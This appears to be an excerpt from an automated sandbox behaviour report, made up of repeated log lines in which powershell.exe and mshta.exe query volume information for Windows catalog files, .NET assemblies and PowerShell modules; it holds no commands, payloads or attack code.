      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
